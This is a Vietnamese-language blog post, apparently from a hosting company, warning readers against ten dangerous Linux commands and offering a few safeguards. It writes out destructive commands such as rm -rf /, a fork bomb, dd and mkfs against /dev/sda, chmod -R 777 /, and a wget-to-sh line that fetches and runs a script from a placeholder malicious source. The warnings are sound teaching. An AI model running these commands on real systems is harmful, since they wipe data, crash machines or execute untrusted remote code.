10 lệnh nguy hiểm trên Linux bạn không nên thực thi

  • Wednesday 21/12/2022

Giao diện command-line là một tiện ích mạnh mẽ và tiện dụng để quản trị hệ thống Linux. Nó giúp vận hành hệ thống một cách nhanh chóng và linh hoạt, đặc biệt là khi quản lý các hệ thống không có giao diện đồ họa. Mặc dù hữu ích trong việc quản lý hệ thống của bạn, nhưng có những command chứa đầy rủi ro. Thực thi các lệnh nguy hiểm có thể gây thiệt hại không thể phục hồi cho hệ thống của bạn. Trong hướng dẫn này, chúng tôi đã tổng hợp danh sách một số lệnh rủi ro nhất mà bạn không nên thực thi trên hệ thống của mình.

10 lệnh nguy hiểm trên Linux

1. rm -rf

Lệnh rm là một lệnh được sử dụng để xóa các tệp và thư mục tùy thuộc vào các đối số được sử dụng. Tuy nhiên, cần hết sức thận trọng khi sử dụng lệnh rm vì một lỗi đánh máy hoặc nhầm lẫn nhỏ có thể dẫn đến hư hỏng hệ thống và không thể phục hồi.Khi được thực thi với quyền root với tùy chọn -rf, lệnh sẽ xóa tất cả các tệp và thư mục trên hệ thống của bạn bắt đầu từ thư mục gốc (/), cao nhất trong cấu trúc phân cấp Linux. Tóm lại, lệnh rm -rf / sẽ xóa sạch hoàn toàn hệ thống của bạn, dẫn đến hệ thống bị hỏng và không thể khôi phục được.Một số tùy chọn được sử dụng với lệnh rm là.

Lệnh rm trong Linux được sử dụng để xóa tệp.
Lệnh rm -r xóa thư mục theo cách đệ quy, ngay cả thư mục trống.
Lệnh rm -f xóa ‘Tệp chỉ đọc’ mà không cần hỏi.
rm -rf / : Buộc xóa mọi thứ trong thư mục gốc.
rm -rf * : Buộc xóa mọi thứ trong thư mục hiện tại/thư mục làm việc.
rm-rf . : Buộc xóa thư mục hiện tại và các thư mục con.
Trên thực tế, khi bạn chạy lệnh với tư cách là người dùng thông thường, bạn sẽ nhận được hai cảnh báo như ảnh bên dưới.

lệnh nguy hiểm

Mẹo: Để khắc phục tình trạng vô tình xóa tệp bằng lệnh ‘ rm ‘, bạn hãy tạo bí danh của lệnh ‘rm’ là ‘rm -i’ trong tệp “.bashrc” , nó sẽ yêu cầu bạn xác nhận mọi thao tác xóa.

2. Lệnh :(){:|:&};:

Lệnh này hay còn gọi là fork bomb. Lệnh này khi thực thi nó sẽ liên tục tạo bản sao dẫn đến việc tiêu tốn tài nguyên của hệ thống. Trên thực tế, lệnh fork bomb thực chất là một dạng tấn công DoS (Denial-of-Service). Nó còn được gọi là virus Wabbit hoặc Rabbit. Phần tồi tệ nhất là bạn không cần phải root để khởi động cuộc tấn công này.
Rất may, bạn có thể tự bảo vệ mình khỏi cuộc tấn công này bằng cách giới hạn số lượng do người dùng cục bộ chạy ở mức khoảng 4000 bằng cách chạy lệnh

$ ulimit -S -u 4000
Bạn có thể kiểm tra lại thông số này bằng cách sử dụng lệnh:
ulimit -u
lệnh nguy hiểm

3. Lệnh > /dev/sda

Lệnh này sẽ ghi đè dữ liệu vào ổ cứng của bạn dẫn đến việc hư hỏng hệ thống và không khôi phục được

4. mv folder /dev/null

Một thao tác nguy hiểm khác mà bạn không nên thử là di chuyển thư mục hoặc tệp sang /dev/nullTệp /dev/nulllà một loại tệp đặc biệt được gọi là thiết bị rỗng hoặc “ lỗ đen ”. Bất cứ thứ gì được chuyển đến /dev/nullđều bị loại bỏ và phá hủy.

5. wget http://malicious_source -O- | sh

Lệnh wget là lệnh tải tệp xuống từ web hoặc máy chủ tệp. Lệnh trên tải xuống tập lệnh từ một nguồn độc hại sau đó thực thi tập lệnh đó.

6. mkfs.ext3 /dev/sda

Lệnh mkfs dùng để format ổ cứng của bạn cũng giống như bạn thực hiện format ổ đĩa trên hệ điều hành windows, mọi dữ liệu sẽ bị xóa hết.

7. > file

Tệp >xóa sạch nội dung của tệp và để trống. Nó đồng nghĩa với lệnh cat /dev/null > file . Do đó, cần thận trọng khi sử dụng các toán tử chuyển hướng trong hệ thống Linux.

8.  ^foo^bar 

Lệnh ^foo^barnguy hiểm cũng như hữu ích tùy thuộc vào cách nó được thực thi. Mặc dù nó cho phép bạn chỉnh sửa các lệnh đã thực hiện trước đó và thực hiện lại chúng, nhưng sẽ rất tai hại nếu bạn không quan tâm đến những thay đổi được thực hiện đối với các lệnh trước khi thực thi chúng.

9. dd if=/dev/random of=/dev/sda

Lệnh trên xóa sạch khối /dev/sda và ghi dữ liệu rác ngẫu nhiên vào khối. Hệ thống của bạn sẽ không nhất quán và không thể phục hồi

10. Chmod -R 777 /

Mặc dù nó có thể không làm hỏng hệ thống Linux của bạn như các lệnh bên trên, nhưng việc thực thi lệnh này cung cấp cho tất cả người dùng của hệ thống quyền đọc, ghi và thực thi dữ liệu trên hệ thống của bạn. Việc này sẽ làm lộ các file cấu hình hoặc các file quan trọng khác bên trong hệ thống của bạn, gây ra rủi ro bảo mật rất lớn.


= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = 
Tham khảo các bài viết liên quan khác tại đây.

= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = 

P.A Việt Nam cung cấp đa dạng các cấu hình Máy Chủ Ảo và Máy Chủ Riêng
Cloud Server
Cloud Server Pro
Máy Chủ Riêng

Tham khảo các ưu đãi: https://www.pavietnam.vn/vn/tin-khuyen-mai/

Rate this post